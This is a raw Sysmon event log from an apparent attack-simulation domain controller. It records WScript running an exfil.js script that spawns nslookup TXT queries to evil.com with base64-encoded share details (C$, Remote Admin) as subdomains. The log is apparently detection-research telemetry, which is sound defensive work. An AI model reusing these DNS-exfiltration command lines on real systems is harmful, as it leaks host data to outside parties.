10341000x8000000000000000214736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-18E0-629A-6742-000000005F02}39767708C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-0346-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.871{2E1864BB-18FC-629A-0346-000000005F02}7664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleatnarz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmsdh.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.836{2E1864BB-18FC-629A-0146-000000005F02}10287204C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-0246-000000005F02}7240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.836{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.836{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.836{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.836{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.836{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0246-000000005F02}7240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.836{2E1864BB-18FC-629A-0046-000000005F02}72725488C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-0246-000000005F02}7240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.845{2E1864BB-18FC-629A-0246-000000005F02}7240C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-0046-000000005F02}7272C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmsdh.tmp 2>&1 10341000x8000000000000000214725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.820{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-0146-000000005F02}1028C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.820{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-0146-000000005F02}1028C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.804{2E1864BB-18FC-629A-0146-000000005F02}10287204C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-0046-000000005F02}7272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.804{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0146-000000005F02}1028C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.804{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.804{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.804{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.804{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.804{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0046-000000005F02}7272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.803{2E1864BB-18E0-629A-6742-000000005F02}39762104C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-0046-000000005F02}7272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.803{2E1864BB-18FC-629A-0046-000000005F02}7272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmsdh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.799{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllqbzts.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.766{2E1864BB-18FC-629A-FE45-000000005F02}48366408C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-FF45-000000005F02}6432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.751{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.751{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.751{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.751{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-FF45-000000005F02}6432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.751{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.751{2E1864BB-18FC-629A-FD45-000000005F02}76321036C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-FF45-000000005F02}6432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.762{2E1864BB-18FC-629A-FF45-000000005F02}6432C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-FD45-000000005F02}7632C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllqbzts.tmp 2>&1 10341000x8000000000000000214705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 